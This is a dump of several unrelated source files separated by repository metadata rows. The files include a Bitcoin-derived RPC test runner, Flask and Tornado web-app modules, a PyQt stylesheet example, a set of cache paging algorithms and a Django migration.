logging.info("Disable Transmitter")
closeWAVE()
CONTROL = value
## Write CHANNELS register (user register)
# @param value value to write (32-bit)
def wrCHANNELS(value):
global CHANNELS
CHANNELS = value
logging.info("Number of channels: {}".format(value))
## Write SAMPLE_BITS register (user register)
# @param value value to write (32-bit)
def wrSAMPLE_BITS(value):
global SAMPLE_BITS
SAMPLE_BITS = value
logging.info("Sample bits: {}".format(value))
## Write SAMPLE_RATE register (user register)
# @param value value to write (32-bit)
def wrSAMPLE_RATE(value):
global SAMPLE_RATE
SAMPLE_RATE = value
logging.info("Sample rate: {}".format(value))
## Read user registers (the VSI User Registers)
# @param index user register index (zero based)
# @return value value read (32-bit)
def rdRegs(index):
global Regs
logging.info("Python function rdRegs() called")
value = Regs[index]
logging.debug("Read user register at index {}: {}".format(index, value))
return value
## Write user registers (the VSI User Registers)
# @param index user register index (zero based)
# @param value value to write (32-bit)
# @return value value written (32-bit)
def wrRegs(index, value):
global Regs
logging.info("Python function wrRegs() called")
if index == 0:
wrCONTROL(value)
elif index == 1:
wrCHANNELS(value)
elif index == 2:
wrSAMPLE_BITS(value)
elif index == 3:
wrSAMPLE_RATE(value)
Regs[index] = value
logging.debug("Write user register at index {}: {}".format(index, value))
return value
## @}
| [
"robert.rostohar@arm.com"
] | robert.rostohar@arm.com |
dbcf0d7a4a2c281299369fafdd1f56bb32569b62 | a0369b03a6da17571a58d55b777a748abd7efba2 | /qa/pull-tester/rpc-tests.py | 75f7efa89b488d2028217f6251b3efb06d098c54 | [
"MIT"
] | permissive | bestsoftdevelop777/BitrityOfficial | 25dbb0bef4273f2453dc74900b5da5abd753d820 | 17f8780a36e4be0cec0f69be15ae489247153a26 | refs/heads/master | 2023-03-07T08:15:53.461305 | 2018-08-10T18:41:56 | 2018-08-10T18:41:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,791 | py | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
Run Regression Test Suite
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts, other
than:
- `-extended`: run the "extended" test suite in addition to the basic one.
- `-win`: signal that this is running in a Windows environment, and we
should run the tests.
- `--coverage`: this generates a basic coverage report for the RPC
interface.
For a description of arguments recognized by test scripts, see
`qa/pull-tester/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
sys.path.append("qa/pull-tester/")
from tests_config import *
BOLD = ("","")
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
RPC_TESTS_DIR = SRCDIR + '/qa/rpc-tests/'
#If imported values are not defined then set to zero (or disabled)
if 'ENABLE_WALLET' not in vars():
ENABLE_WALLET=0
if 'ENABLE_BITCOIND' not in vars():
ENABLE_BITCOIND=0
if 'ENABLE_UTILS' not in vars():
ENABLE_UTILS=0
if 'ENABLE_ZMQ' not in vars():
ENABLE_ZMQ=0
# python-zmq may not be installed. Handle this gracefully and with some helpful info
if ENABLE_ZMQ:
try:
import zmq
except ImportError:
print("WARNING: \"import zmq\" failed. Setting ENABLE_ZMQ=0. " \
"To run zmq tests, see dependency info in /qa/README.md.")
ENABLE_ZMQ=0
ENABLE_COVERAGE=0
#Create a set to store arguments and create the passon string
opts = set()
passon_args = []
PASSON_REGEX = re.compile("^--")
PARALLEL_REGEX = re.compile('^-parallel=')
print_help = False
run_parallel = 4
for arg in sys.argv[1:]:
if arg == "--help" or arg == "-h" or arg == "-?":
print_help = True
break
if arg == '--coverage':
ENABLE_COVERAGE = 1
elif PASSON_REGEX.match(arg):
passon_args.append(arg)
elif PARALLEL_REGEX.match(arg):
run_parallel = int(arg.split(sep='=', maxsplit=1)[1])
else:
opts.add(arg)
#Set env vars
if "BITYD" not in os.environ:
os.environ["BITYD"] = BUILDDIR + '/src/bitrityd' + EXEEXT
if EXEEXT == ".exe" and "-win" not in opts:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print("Win tests currently disabled by default. Use -win option to enable")
sys.exit(0)
if not (ENABLE_WALLET == 1 and ENABLE_UTILS == 1 and ENABLE_BITCOIND == 1):
print("No rpc tests to run. Wallet, utils, and bitcoind must all be enabled")
sys.exit(0)
# python3-zmq may not be installed. Handle this gracefully and with some helpful info
if ENABLE_ZMQ:
try:
import zmq
except ImportError:
print("ERROR: \"import zmq\" failed. Set ENABLE_ZMQ=0 or "
"to run zmq tests, see dependency info in /qa/README.md.")
# ENABLE_ZMQ=0
raise
testScripts = [
# longest test should go first, to favor running tests in parallel
'wallet-hd.py',
'walletbackup.py',
# vv Tests less than 5m vv
'p2p-fullblocktest.py', # NOTE: needs dash_hash to pass
'fundrawtransaction.py',
'fundrawtransaction-hd.py',
# vv Tests less than 2m vv
'wallet.py',
'wallet-accounts.py',
'wallet-dump.py',
'listtransactions.py',
# vv Tests less than 60s vv
'sendheaders.py', # NOTE: needs dash_hash to pass
'zapwallettxes.py',
'importmulti.py',
'mempool_limit.py',
'merkle_blocks.py',
'receivedby.py',
'abandonconflict.py',
'bip68-112-113-p2p.py',
'rawtransactions.py',
'reindex.py',
# vv Tests less than 30s vv
'mempool_resurrect_test.py',
'txn_doublespend.py --mineblock',
'txn_clone.py',
'getchaintips.py',
'rest.py',
'mempool_spendcoinbase.py',
'mempool_reorg.py',
'httpbasics.py',
'multi_rpc.py',
'proxy_test.py',
'signrawtransactions.py',
'nodehandling.py',
'addressindex.py',
'timestampindex.py',
'spentindex.py',
'decodescript.py',
'blockchain.py',
'disablewallet.py',
'keypool.py',
'keypool-hd.py',
'p2p-mempool.py',
'prioritise_transaction.py',
'invalidblockrequest.py', # NOTE: needs dash_hash to pass
'invalidtxrequest.py', # NOTE: needs dash_hash to pass
'p2p-versionbits-warning.py',
'preciousblock.py',
'importprunedfunds.py',
'signmessages.py',
'nulldummy.py',
'import-rescan.py',
'rpcnamedargs.py',
'listsinceblock.py',
'p2p-leaktests.py',
'p2p-compactblocks.py',
]
if ENABLE_ZMQ:
testScripts.append('zmq_test.py')
testScriptsExt = [
# 'pruning.py', # Prune mode is incompatible with -txindex.
# vv Tests less than 20m vv
'smartfees.py',
# vv Tests less than 5m vv
'maxuploadtarget.py',
'mempool_packages.py',
# vv Tests less than 2m vv
'bip68-sequence.py',
'getblocktemplate_longpoll.py', # FIXME: "socket.error: [Errno 54] Connection reset by peer" on my Mac, same as https://github.com/bitcoin/bitcoin/issues/6651
'p2p-timeouts.py',
# vv Tests less than 60s vv
'bip9-softforks.py',
'rpcbind_test.py',
# vv Tests less than 30s vv
'bip65-cltv.py',
'bip65-cltv-p2p.py', # NOTE: needs dash_hash to pass
'bipdersig-p2p.py', # NOTE: needs dash_hash to pass
'bipdersig.py',
'getblocktemplate_proposals.py',
'txn_doublespend.py',
'txn_clone.py --mineblock',
'forknotify.py',
'invalidateblock.py',
'maxblocksinflight.py',
'p2p-acceptblock.py', # NOTE: needs dash_hash to pass
# 'replace-by-fee.py', # RBF is disabled in Bitrity Core
]
def runtests():
test_list = []
if '-extended' in opts:
test_list = testScripts + testScriptsExt
elif len(opts) == 0 or (len(opts) == 1 and "-win" in opts):
test_list = testScripts
else:
for t in testScripts + testScriptsExt:
if t in opts or re.sub(".py$", "", t) in opts:
test_list.append(t)
if print_help:
# Only print help of the first script and exit
subprocess.check_call((RPC_TESTS_DIR + test_list[0]).split() + ['-h'])
sys.exit(0)
coverage = None
if ENABLE_COVERAGE:
coverage = RPCCoverage()
print("Initializing coverage directory at %s\n" % coverage.dir)
flags = ["--srcdir=%s/src" % BUILDDIR] + passon_args
flags.append("--cachedir=%s/qa/cache" % BUILDDIR)
if coverage:
flags.append(coverage.flag)
if len(test_list) > 1 and run_parallel > 1:
# Populate cache
subprocess.check_output([RPC_TESTS_DIR + 'create_cache.py'] + flags)
#Run Tests
max_len_name = len(max(test_list, key=len))
time_sum = 0
time0 = time.time()
job_queue = RPCTestHandler(run_parallel, test_list, flags)
results = BOLD[1] + "%s | %s | %s\n\n" % ("TEST".ljust(max_len_name), "PASSED", "DURATION") + BOLD[0]
all_passed = True
for _ in range(len(test_list)):
(name, stdout, stderr, passed, duration) = job_queue.get_next()
all_passed = all_passed and passed
time_sum += duration
print('\n' + BOLD[1] + name + BOLD[0] + ":")
print('' if passed else stdout + '\n', end='')
print('' if stderr == '' else 'stderr:\n' + stderr + '\n', end='')
results += "%s | %s | %s s\n" % (name.ljust(max_len_name), str(passed).ljust(6), duration)
print("Pass: %s%s%s, Duration: %s s\n" % (BOLD[1], passed, BOLD[0], duration))
results += BOLD[1] + "\n%s | %s | %s s (accumulated)" % ("ALL".ljust(max_len_name), str(all_passed).ljust(6), time_sum) + BOLD[0]
print(results)
print("\nRuntime: %s s" % (int(time.time() - time0)))
if coverage:
coverage.report_rpc_coverage()
print("Cleaning up coverage data")
coverage.cleanup()
sys.exit(not all_passed)
class RPCTestHandler:
"""
Trigger the testscrips passed in via the list.
"""
def __init__(self, num_tests_parallel, test_list=None, flags=None):
assert(num_tests_parallel >= 1)
self.num_jobs = num_tests_parallel
self.test_list = test_list
self.flags = flags
self.num_running = 0
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
self.portseed_offset = int(time.time() * 1000) % 625
self.jobs = []
def get_next(self):
while self.num_running < self.num_jobs and self.test_list:
# Add tests
self.num_running += 1
t = self.test_list.pop(0)
port_seed = ["--portseed={}".format(len(self.test_list) + self.portseed_offset)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
self.jobs.append((t,
time.time(),
subprocess.Popen((RPC_TESTS_DIR + t).split() + self.flags + port_seed,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr),
log_stdout,
log_stderr))
if not self.jobs:
raise IndexError('pop from empty list')
while True:
# Return first proc that finishes
time.sleep(.5)
for j in self.jobs:
(name, time0, proc, log_out, log_err) = j
if proc.poll() is not None:
log_out.seek(0), log_err.seek(0)
[stdout, stderr] = [l.read().decode('utf-8') for l in (log_out, log_err)]
log_out.close(), log_err.close()
passed = stderr == "" and proc.returncode == 0
self.num_running -= 1
self.jobs.remove(j)
return name, stdout, stderr, passed, int(time.time() - time0)
print('.', end='', flush=True)
class RPCCoverage(object):
"""
Coverage reporting utilities for pull-tester.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: qa/rpc-tests/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir=%s' % self.dir
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - %s\n" % i) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `qa/rpc-tests/test-framework/coverage.py`
REFERENCE_FILENAME = 'rpc_interface.txt'
COVERAGE_FILE_PREFIX = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, REFERENCE_FILENAME)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r') as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(COVERAGE_FILE_PREFIX):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r') as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
if __name__ == '__main__':
runtests()
| [
"vangyangpao@gmail.com"
] | vangyangpao@gmail.com |
0d7102130db2739bb99c1c008e466724c33ed4b7 | 583d03a6337df9f1e28f4ef6208491cf5fb18136 | /dev4qx/messagepush/task/subscribe.py | be4fdbc0be1cdda9998b0a83fc02a876b7637185 | [] | no_license | lescpsn/lescpsn | ece4362a328f009931c9e4980f150d93c4916b32 | ef83523ea1618b7e543553edd480389741e54bc4 | refs/heads/master | 2020-04-03T14:02:06.590299 | 2018-11-01T03:00:17 | 2018-11-01T03:00:17 | 155,309,223 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,146 | py | # -*- coding: utf-8 -*-
import logging
import tornado
from core.subscribe import subscrible_direct
request_log = logging.getLogger("ms.request")
class SubscribeTask(tornado.ioloop.PeriodicCallback):
def __init__(self, application, callback_time):
super(SubscribeTask, self).__init__(self.run, callback_time)
self.application = application
self.master = self.application.sentinel.master_for('madeira')
@tornado.gen.coroutine
def run(self):
# TODO: try
try:
r = self.master
# TODO: return types is empty
types = r.smembers('types')
if types is None:
self.finish('type空')
elif types is not None:
msg_type = r.spop('types')
func = self.application.config['subscrible'].get(msg_type)
request_log.info('GET TASK_MESSAGE %s %s %s', types, msg_type, func)
if func == 'direct':
yield subscrible_direct(self.application, msg_type)
except:
request_log.exception('FAIL')
| [
"lescpsn@aliyun.com"
] | lescpsn@aliyun.com |
745600672d996d6b00859d9699a4b2c35ddc8518 | a3b13b2ffa8a353276cd4a8e1a14f2ca593277af | /app/main/routes.py | 0c2d8fee5ac5c71dee54d5d5fa9b22b4789f153b | [
"MIT"
] | permissive | anlance/cdut2016 | ae8db458b2d8ecea80ff6d2d4e890a5acc9e7003 | 4f96b92d83a4bfc051b7b04ebdd5740aaed623a1 | refs/heads/master | 2022-12-09T12:31:00.211656 | 2019-02-20T13:45:44 | 2019-02-20T13:45:44 | 146,073,304 | 0 | 0 | MIT | 2022-12-08T02:58:55 | 2018-08-25T06:58:15 | Python | UTF-8 | Python | false | false | 2,365 | py | from datetime import datetime
from flask import render_template, flash, redirect, request, url_for, jsonify, json
from flask_login import current_user, login_required
import re
from app import db
from app.forms import DiscussForm
from app.main import bp
from app.models import User, Discuss, AnnounceModel
from app.news_cdut.models import NewsCdut
from app.spider.cdut import init_news
from app.spider.today import get_today
@bp.before_request
@login_required
def before_request():
if current_user.is_authenticated:
current_user.last_seen = datetime.now()
db.session.commit()
@bp.route('/', methods=['GET', 'POST'])
@bp.route('/index', methods=['GET', 'POST'])
@login_required
def index():
discuss_form = DiscussForm()
news_cduts, all_count = init_news()
news_cdut = news_cduts[-7:-1]
notices = AnnounceModel.query.filter().order_by(AnnounceModel.up_time.desc()).limit(6)
user_said = Discuss.query.filter(Discuss.id > 1).all()
today = get_today()
thisdate = datetime.now()
thisdatetime = datetime.now()
return render_template('index.html', title='Home Page', news_cdut=news_cdut, today=today, user_said=user_said, discuss_form=discuss_form, notices=notices, date=thisdate,datetime=thisdatetime,re=re)
@bp.route('/add_discuss', methods=['POST'])
@login_required
def add_discuss():
data = json.loads(request.form.get('data'))
username = data['username']
said = data['said']
try:
discuss = Discuss(username=username, said=said)
db.session.add(discuss)
db.session.commit()
except Exception as err:
flash(err+":发送失败", 'info')
user_said = Discuss.query.filter(Discuss.id > 1).all()
return jsonify({"success": 200, "user_said": [i.serialize() for i in user_said]})
@bp.route('/announce/more', methods=['GET', 'POST'])
def more():
page = request.args.get('page', 1, type=int)
announce_models = AnnounceModel.query.order_by(AnnounceModel.up_time.desc()).paginate(page, 10, False)
next_url = url_for('news_cdut.more', page=announce_models.next_num) if announce_models.has_next else None
prev_url = url_for('news_cdut.more', page=announce_models.prev_num) if announce_models.has_prev else None
return render_template('announces/more.html', announces=announce_models.items, next_url=next_url, prev_url=prev_url)
| [
"anlan1996@qq.com"
] | anlan1996@qq.com |
56b4c3dd8ee6578ff8fd4df7d45d128709517dc9 | 6f133957d939ab88f16af4ff2b897c7796f5e7da | /wtxlog/utils/email.py | 7d968047108920c982d4efa0ad9b216b170c2de9 | [] | no_license | xtmhm2000/wtxlog | 25786b0fec99c2f293c7dd4165bfb5456c7549dd | 2de18c91c6125fcd2fdc478d7cfe3cb9b40599ff | refs/heads/master | 2021-01-17T05:45:27.129052 | 2015-02-09T06:06:39 | 2015-02-09T06:06:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 691 | py | from threading import Thread
from flask import current_app
from flask.ext.mail import Message
from ..ext import mail
from .helpers import render_template
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['APP_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['APP_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
| [
"digwtx@ubuntu.(none)"
] | digwtx@ubuntu.(none) |
fbefcb0112cca43cc7b8a399c2dde0d4ca329f56 | 182c651a9b00b9b4d80e6d51ae574cb793958cd6 | /widgets/stylesheet/stylesheet.py | f9c37d6886961ae308ad487c3780ee79e8573ba3 | [] | no_license | eudu/pyqt-examples | c61a7108e1fbfcf2cd918a0f99e9a5a90a3f305c | 8e533b7b3c5e9bbe0617ef1ecb9b169dd216c181 | refs/heads/master | 2020-03-16T01:23:19.573347 | 2018-05-06T20:20:57 | 2018-05-06T20:20:57 | 132,438,940 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,546 | py | #!/usr/bin/python3
#############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited
## Copyright (C) 2010 Hans-Peter Jansen <hpj@urpla.net>.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
###########################################################################
from PyQt5.QtWidgets import QApplication, QLabel, QMainWindow, QMessageBox
import stylesheet_rc
from ui_mainwindow import Ui_MainWindow
from stylesheeteditor import StyleSheetEditor
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow, self).__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.ui.nameLabel.setProperty('class', 'mandatory QLabel')
self.styleSheetEditor = StyleSheetEditor(self)
self.statusBar().addWidget(QLabel("Ready"))
self.ui.exitAction.triggered.connect(QApplication.instance().quit)
self.ui.aboutQtAction.triggered.connect(QApplication.instance().aboutQt)
def on_editStyleAction_triggered(self):
self.styleSheetEditor.show()
self.styleSheetEditor.activateWindow()
def on_aboutAction_triggered(self):
QMessageBox.about(self, "About Style sheet",
"The <b>Style Sheet</b> example shows how widgets can be "
"styled using "
"<a href=\"http://doc.qt.digia.com/4.5/stylesheet.html\">Qt "
"Style Sheets</a>. Click <b>File|Edit Style Sheet</b> to pop "
"up the style editor, and either choose an existing style "
"sheet or design your own.")
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
| [
"dukalow@gmail.com"
] | dukalow@gmail.com |
9d8c06c7fd4bbe26b5861b1a1fcc6fc581759472 | bc1037d35cddecbfaa1b3fb0549a9721aba7a815 | /Problems/5.30/Solution-1/paging.py | 74134883c38e3be319009d64ed49982257cd14e4 | [] | no_license | crhntr/IAA-Code | 0d6a322d64857f7a17cb1faf72c0c9bb7e41f936 | 32d725eeed3012a1644ca30ee2899b7bfe8d5b09 | refs/heads/master | 2021-05-11T00:20:36.065974 | 2018-01-22T01:40:02 | 2018-01-22T01:40:02 | 118,299,269 | 1 | 0 | null | 2018-01-21T02:53:21 | 2018-01-21T02:53:20 | null | UTF-8 | Python | false | false | 11,444 | py | # Introduction to the Analysis of Algorithms (3rd ed)
# Michael Soltys
## Problem 5.30 - Paging
## Ryan McIntyre
## 6/22/2017
## python 3.5.2
from collections import Counter as counter
"""
Online*:
LRU = "Least Recently Used", self explanatory
FIFO = "First In / First Out", self explanatory
LIFO = "Last In / First Out", self explanatory but stupid in most situations
LFU = "Least Frequently Used", self explanatory. Use LRU as "backup" sort?
CLOCK = go to wikipedia, but short version:
cache is circular linked list, with auxillary circular reference list.
reference list is set to '1' at position of pointer when a new page is
inserted into cache. In order to evict, look at pointer. if referenced
list at pointer is 1, change to 0 and move to next item to repeat. If
referenced is 0, evict and add new page (set reference to 0) and move
pointer.
Basically "LRU" but each inserted page has an "extra life" before it
gets evictet. Small cost for (usually) larger gain over LRU, worst
case is LRU + "extra check" for each eviction.
Offline:
LFD = "Longest Forward Distance", self explanatory, equivalent to OPT
"""
#------------------------------------------------------------------------------
#------------------------------------------------------------------linked_lists
#------------------------------------------------------------------------------
class ll_item():
def __init__(self,tag=0):
self.tag = tag
self.prev = None
self.next = None
def set_next(self,n):
self.next = n
def set_prev(self,n):
self.prev = n
def get_next(self):
return self.next
def get_prev(self):
return self.prev
def set_tag(self,tag):
self.tag = tag
def get_tag(self):
return self.tag
class ll():
def __init__(self,cache_size):
self.head = ll_item('head')
body = [ll_item() for i in range(cache_size)]
self.head.set_next(body[0])
body[0].set_prev(self.head)
for i in range(1,len(body)):
body[i-1].set_next(body[i])
body[i].set_prev(body[i-1])
self.current = self.head.get_next()
def get_cur(self):
return self.current.get_tag()
def set_cur(self,tag):
self.current.set_tag(tag)
def get_head(self):
return self.head
def turn(self):
self.current = self.current.get_next()
def get_next(self):
return self.current.get_next()
def detach(self):
self.current.get_prev().set_next(self.current.get_next())
if self.current.get_next():
self.current.get_next().set_prev(self.current.get_prev())
self.turn()
def prepend(self,tag):
new = ll_item(tag)
h = self.head.get_next()
self.head.set_next(new)
new.set_prev(self.head)
h.set_prev(new)
new.set_next(h)
self.current = new
def mtf(self):
c = self.current
self.detach()
h = self.head.get_next()
self.head.set_next(c)
c.set_prev(self.head)
c.set_next(h)
h.set_prev(c)
def reset(self):
self.current = self.head
#------------------------------------------------------------------------------
#---------------------------------------------------------------------------LRU
#------------------------------------------------------------------------------
class LRU():
def __init__(self,cache_size):
self.ll = ll(cache_size)
self.fault_count = 0
def process(self,request):
self.ll.reset()
done = False
while self.ll.get_next():
self.ll.turn()
tag = self.ll.get_cur()
if tag == request:
done = True
self.ll.mtf()
break
elif tag == 0:
self.fault_count += 1
self.ll.set_cur(request)
self.ll.mtf()
done = True
break
if not done:
self.ll.set_cur(request)
self.ll.mtf()
self.fault_count += 1
def reset_cache_size(self,n):
self.__init__(n)
#------------------------------------------------------------------------------
#--------------------------------------------------------------------------FIFO
#------------------------------------------------------------------------------
class FIFO():
def __init__(self,cache_size):
self.ll = ll(cache_size)
self.fault_count = 0
def process(self,request):
self.ll.reset()
done = False
while self.ll.get_next():
self.ll.turn()
tag = self.ll.get_cur()
if tag == request:
done = True
break
elif tag == 0:
self.fault_count += 1
self.ll.set_cur(request)
self.ll.mtf()
done = True
break
if not done:
self.ll.set_cur(request)
self.ll.mtf()
self.fault_count += 1
def reset_cache_size(self,n):
self.__init__(n)
#------------------------------------------------------------------------------
#--------------------------------------------------------------------------LIFO
#------------------------------------------------------------------------------
class LIFO():
def __init__(self,cache_size):
self.ll = ll(cache_size)
self.fault_count = 0
def process(self,request):
self.ll.reset()
done = False
while self.ll.get_next():
self.ll.turn()
tag = self.ll.get_cur()
if tag == request:
done = True
break
elif tag == 0:
self.fault_count += 1
self.ll.set_cur(request)
done = True
break
if not done:
self.ll.set_cur(request)
self.ll.mtf()
self.fault_count += 1
def reset_cache_size(self,n):
self.__init__(n)
#------------------------------------------------------------------------------
#---------------------------------------------------------------------------LFU
#------------------------------------------------------------------------------
class LFU():
def __init__(self,cache_size):
self.count = counter()
self.fault_count = 0
self.size = cache_size
def process(self,request):
if request in self.count:
self.count[request] += 1
elif len(self.count) < self.size:
self.fault_count += 1
self.count[request] += 1
else:
lfu = min(self.count, key = lambda x : self.count[x])
del self.count[lfu]
self.count[request] += 1
self.fault_count += 1
def reset_cache_size(self,n):
self.__init__(n)
#------------------------------------------------------------------------------
#-------------------------------------------------------------------------CLOCK
#------------------------------------------------------------------------------
#CLOCK requires a circular linked list
class cll():
def __init__(self,cache_size):
items = [ll_item() for i in range(cache_size)]
for i in range(cache_size-1):
items[i].set_next(items[i+1])
items[i+1].set_prev(items[i])
items[0].set_prev(items[-1])
items[-1].set_next(items[0])
self.current = items[0]
def get_cur(self):
return self.current.get_tag()
def get_cur_node(self):
return self.current
def set_cur(self,tag):
self.current.set_tag(tag)
def turn(self):
self.current = self.current.get_next()
def get_next(self):
return self.current.get_next()
class CLOCK():
def __init__(self,cache_size):
self.clock = cll(cache_size)
self.referenced = cll(cache_size)
self.size = cache_size
self.fault_count = 0
def turn(self):
self.clock.turn()
self.referenced.turn()
def process(self,request):
done = False
cur = self.clock.get_cur_node()
r = self.referenced.get_cur_node()
i = 0
passed = []
while i < self.size:
if cur.get_tag() == request:
r.set_tag(1)
done = True
for re in passed:
re.set_tag(0)
break
elif cur.get_tag() == 0:
self.fault_count += 1
r.set_tag(0)
cur.set_tag(request)
done = True
break
passed.append(r)
r = r.get_next()
cur = cur.get_next()
i += 1
if not done:
self.fault_count += 1
while True:
if self.referenced.get_cur == 1:
self.referenced.set_cur(0)
self.turn()
else:
self.clock.set_cur(request)
self.referenced.set_cur(0)
self.turn()
break
def reset_lists(self):
i = 0
while i < self.size:
self.clock.set_cur(0)
self.referenced.set_cur(0)
self.turn()
i += 1
def reset_score(self):
self.score = 0
def full_reset(self):
self.reset_lists()
self.reset_score()
def reset_cache_size(self,n):
self.__init__(n)
#------------------------------------------------------------------------------
#---------------------------------------------------------------------LFD / OPT
#------------------------------------------------------------------------------
class LFD:
def __init__(self,cache_size):
self.distance = dict()
self.size = cache_size
self.fault_count = 0
def process(self,request_list):
i = 0
while i < len(request_list):
r = request_list[i]
if r in self.distance:
if r in request_list[i+1:]:
self.distance[r] += request_list[i+1:].index(r)+1
else:
self.distance[r] = float('inf')
elif len(self.distance) < self.size:
self.fault_count += 1
if r in request_list[i+1:]:
self.distance[r] = i+1+request_list[i+1:].index(r)
else:
self.distance[r] = float('inf')
else:
self.fault_count += 1
d = max(self.distance, key = lambda x : self.distance[x])
del self.distance[d]
if r in request_list[i+1:]:
self.distance[r] = i+1+request_list[i+1:].index(r)
else:
self.distance[r] = float('inf')
i += 1
def reset_cache_size(self,n):
self.__init__(n) | [
"arewhyaeenn@gmail.com"
] | arewhyaeenn@gmail.com |
0ad13de9417ee4a25adef859f6294905a1ef218a | e6042030b195a88a949cd5763244cc76ac1214cc | /users/migrations/0002_profile_info.py | f5e280bec29f5e3ce2c436a8ef5a3059504b0aee | [] | no_license | 3liud/Bidding_store | a5eaa2a92b98e0ff5b04cdc9a39ab3c6c1ed9222 | 315073a31919f7f60174361455594a8def9197f1 | refs/heads/master | 2020-04-14T09:28:25.798386 | 2019-04-29T07:25:58 | 2019-04-29T07:25:58 | 163,760,916 | 0 | 1 | null | 2019-03-20T08:32:12 | 2019-01-01T19:24:23 | Python | UTF-8 | Python | false | false | 840 | py | # Generated by Django 2.1.7 on 2019-03-29 09:17
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('users', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Profile_info',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('account', models.IntegerField(max_length=20)),
('address', models.CharField(default='0', max_length=500)),
('name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"eliud@localhost.localdomain"
] | eliud@localhost.localdomain |
